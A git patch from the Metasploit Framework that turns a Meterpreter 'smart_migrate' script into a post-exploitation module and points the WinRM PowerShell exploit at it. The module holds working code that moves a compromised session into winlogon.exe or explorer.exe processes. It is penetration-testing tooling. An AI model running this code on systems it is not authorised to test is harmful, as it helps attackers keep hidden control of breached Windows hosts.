From 00b9fb3c90bc853fecf7281225d8cbf589161ce4 Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Wed, 31 Oct 2012 17:03:49 -0500
Subject: [PATCH] Switc smart mgirate to post mod as it should be

---
 .../windows/winrm/winrm_powershell.rb         |  2 +-
 modules/post/windows/manage/smart_migrate.rb  | 73 +++++++++++++++++++
 scripts/meterpreter/smart_migrate.rb          | 43 -----------
 3 files changed, 74 insertions(+), 44 deletions(-)
 create mode 100644 modules/post/windows/manage/smart_migrate.rb
 delete mode 100644 scripts/meterpreter/smart_migrate.rb

diff --git a/modules/exploits/windows/winrm/winrm_powershell.rb b/modules/exploits/windows/winrm/winrm_powershell.rb
index 8ae8dc2fe0..0f55882965 100644
--- a/modules/exploits/windows/winrm/winrm_powershell.rb
+++ b/modules/exploits/windows/winrm/winrm_powershell.rb
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				{
 					'WfsDelay'     => 30,
 					'EXITFUNC' => 'thread',
-					'InitialAutoRunScript' => 'smart_migrate',
+					'InitialAutoRunScript' => 'post/windows/manage/smart_migrate',
 				},
 			'Platform'       => 'win',
 			'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
diff --git a/modules/post/windows/manage/smart_migrate.rb b/modules/post/windows/manage/smart_migrate.rb
new file mode 100644
index 0000000000..dd3a8b5fe8
--- /dev/null
+++ b/modules/post/windows/manage/smart_migrate.rb
@@ -0,0 +1,73 @@
+##
+# $Id$
+##
+
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Post
+
+	def initialize(info={})
+		super( update_info( info,
+			'Name'          => 'Windows Manage Process Migration',
+			'Description'   => %q{ This module will migrate a Meterpreter session.
+				It will first attempt to mgirate to winlogon.exe . If that fails it will
+				then look at all of the explorer.exe processes. If there is one that exists
+				for the user context the session is already in it will try that. Failing that it will fall back
+				and try any other explorer.exe processes it finds},
+			'License'       => MSF_LICENSE,
+			'Author'        => [ 'thelightcosine'],
+			'Version'       => '$Revision$',
+			'Platform'      => [ 'win' ],
+			'SessionTypes'  => [ 'meterpreter' ]
+		))
+
+
+	end
+
+	def run
+		server = client.sys.process.open
+		original_pid = server.pid
+		print_status("Current server process: #{server.name} (#{server.pid})")
+
+		uid = client.sys.config.getuid
+
+		processes = client.sys.process.get_processes
+
+		uid_explorer_procs = []
+		explorer_procs = []
+		winlogon_procs = []
+		processes.each do |proc|
+			uid_explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] == uid
+			explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] != uid
+			winlogon_procs << proc if proc['name'] == "winlogon.exe"
+		end
+
+		winlogon_procs.each { |proc| return if attempt_migration(proc['pid']) }
+		uid_explorer_procs.each { |proc| return if attempt_migration(proc['pid']) }
+		explorer_procs.each { |proc| return if attempt_migration(proc['pid']) }
+
+		print_error "Was unable to sucessfully migrate into any of our likely candidates"
+	end
+
+
+	def attempt_migration(target_pid)
+		begin
+			print_good("Migrating to #{target_pid}")
+			client.core.migrate(target_pid)
+			print_good("Successfully migrated to process #{}")
+			return true
+		rescue ::Exception => e
+			print_error("Could not migrate in to process.")
+			print_error(e)
+			return false
+		end
+	end
+end
diff --git a/scripts/meterpreter/smart_migrate.rb b/scripts/meterpreter/smart_migrate.rb
deleted file mode 100644
index aa4a93f3bf..0000000000
--- a/scripts/meterpreter/smart_migrate.rb
+++ /dev/null
@@ -1,43 +0,0 @@
-# $Id$
-# $Revision$
-#
-
-
-def attempt_migration(target_pid)
-	begin
-		print_good("Migrating to #{target_pid}")
-		client.core.migrate(target_pid)
-		print_good("Successfully migrated to process #{}")
-		return true
-	rescue ::Exception => e
-		print_error("Could not migrate in to process.")
-		print_error(e)
-		return false
-	end
-end
-
-if client.platform =~ /win32|win64/
-	server = client.sys.process.open
-	original_pid = server.pid
-	print_status("Current server process: #{server.name} (#{server.pid})")
-
-	uid = client.sys.config.getuid
-
-	processes = client.sys.process.get_processes
-	
-	uid_explorer_procs = []
-	explorer_procs = []
-	winlogon_procs = []
-	processes.each do |proc|
-		uid_explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] == uid
-		explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] != uid
-		winlogon_procs << proc if proc['name'] == "winlogon.exe"
-	end
-
-	winlogon_procs.each { |proc| return if attempt_migration(proc['pid']) }
-	uid_explorer_procs.each { |proc| return if attempt_migration(proc['pid']) }
-	explorer_procs.each { |proc| return if attempt_migration(proc['pid']) }
-
-	print_error "Was unable to sucessfully migrate into any of our likely candidates"
-
-end